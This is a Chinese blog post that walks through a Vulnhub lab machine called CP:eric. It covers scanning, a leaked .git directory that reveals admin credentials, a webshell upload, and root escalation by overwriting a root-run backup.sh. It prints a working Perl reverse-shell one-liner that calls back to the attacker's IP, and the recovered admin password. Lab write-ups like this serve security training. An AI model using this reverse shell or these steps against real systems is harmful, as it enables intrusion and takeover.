Vulnhub之CP:eric渗透实战

最新推荐文章于 2024-04-27 21:56:30 发布
最新推荐文章于 2024-04-27 21:56:30 发布
阅读量454 收藏 2
点赞数 1
分类专栏: 信息安全 文章标签: vulnhub 信息安全

Vulnhub之CP:eric渗透实战

一、环境搭建
目标:
a、/root/flag.txt
b、/home/eric/flag.txt
难度:初学者
下载链接:https://isz.no/vm/eric.7z
我是用的VirtualBox进行测试的哦!
攻击机:kali linux 2019 IP地址为192.168.34.179

二、渗透实战过程
1、靶机发现、目录爆破
发现靶机 nmap -sP 192.168.34.0/24
在这里插入图片描述
对Ip地址进行nmap扫描 nmap -sV 192.168.34.154
在这里插入图片描述
存在80端口,访问网站,感觉什么发现
在这里插入图片描述
使用dirb进行目录扫描,目录字典用默认字典 dirb http://192.168.34.154
在这里插入图片描述
发现几个可疑的点:(1).git可能存在文件泄露
(2)admin.php 登录界面使用各种爆破及注入无果,想想通过什么方法找用户名密码
(3)upload 可能存在文件上传漏洞
使用GitHck对目录进行扫描,下载下了index.php admin.php
在admin.php发现了用户名和密码:admin/st@mpch0rdt.ightiRu$glo0mappL3,登录页面
在这里插入图片描述
发现了上传页面
2、利用文件上传漏洞,反弹shell
直接上大马,上传成功后返回大马页面
在这里插入图片描述
连接kali,反弹shell
kali监听端口4444 nc -lvp 4444
在这里插入图片描述
查看第一个flag cat /homr/eric/flag.txt
3、提权
本靶机不存在python,但存在perl
在这里插入图片描述
上脚本:perl -e 'use Socket;$i="192.168.34.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
在这里插入图片描述
反弹shell,发现/home/eric目录下存在backup.sh,可以以root的身份执行
使用msf生产sh文件
在这里插入图片描述
覆盖原来的backup.php,并执行backup.sh,有时候反弹不成功,多执行几次就可以了
在这里插入图片描述
在这里插入图片描述
得到了root权限,cat /root/flag.txt
在这里插入图片描述

NineMeet_111
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3132
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7373
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
VulnHub靶机 DC-9 靶机 详细渗透过程
最新发布
rumil的博客
04-27 1404
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6000
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3429
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 9031
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
第四阶段:飞机大战项目实战
01-21
https://pypi.org/project/pygame/#files查看对应的python版本是否有对应的pygame版本(cp37就表示pygame支持的python版本为python3.7),如果有就可以进行后续的安装 如果当前python版本没有对应的pygame版本(比如...
s3cp:Amazon S3命令行工具(例如cp,ls,cat等)
03-03
S3CP:用于Amazon S3文件操作的命令行工具 只需几个简单的命令行实用程序即可列出,复制和查看S3文件,例如s3cp , s3ls , s3cat , s3rm等。 正在安装 确保在系统上安装了Rubygems,然后运行: # gem install s3...
CP2114:桥接芯片.pdf
07-26
CP2114:桥接芯片.pdf
串口CP2102驱动包
08-01
CP2102驱动包是针对使用Silicon Labs公司生产的CP2102串行接口芯片的设备设计的驱动程序集合。这个驱动包确保了在Windows操作系统,包括Win7、Win8以及Win10上,能够顺利地识别并运行基于CP2102芯片的USB转串口模块...
Node.JS实战24:分离子进程。
01-07
通过前面几文的学习我们知道,通过使用execFile、spawn、exec可以打开外部进程并让它单独运行。...cp.spawn(notepad,[],{detached:true},function(err,stdout,stderr){ if(err){ console.error(err);
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2091
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2347
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1961
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
vulnhub-eric
weixin_43841336的博客
07-18 191
扫描靶机:Nmap -sP 192.168.34.1/24 扫描开放端口:nmap -sV 192.168.34.154 扫描网站:dirb +网址 发现有上传漏洞,git泄露,admin应该是登录框 用工具将git回复 恢复了这几个 在admin.Php发现了账号和密码、 登录以后就可以上传文件了,先上传个shell(大马和 反向都可以) 反弹shell的perl码: perl -e ‘use ...
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1203
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Aluxian_的博客
03-22 2860
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机的类型也是第一次做,比较简单。2.smb共享 smbmap枚举(工具得使用)ssh私钥登入3.脏牛提权提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4646
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
Eric靶机渗透测试通关全教程
WuYan_Emperor的博客
07-29 2553
Eric靶机渗透测试通关全教程,拿到普通用户下的`flag`, 拿到`root`用户下的`flag`
cp::NdArray
07-27
C知道: cp::NdArray 是什么? C知道 是一个名为 cp::NdArray 的类,它是C++中的一个多维数组类。它提供了一种方便的方式来操作和处理多维数据,类似于 NumPy 中的 ndarray。cp::NdArray 提供了一组丰富的函数和操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值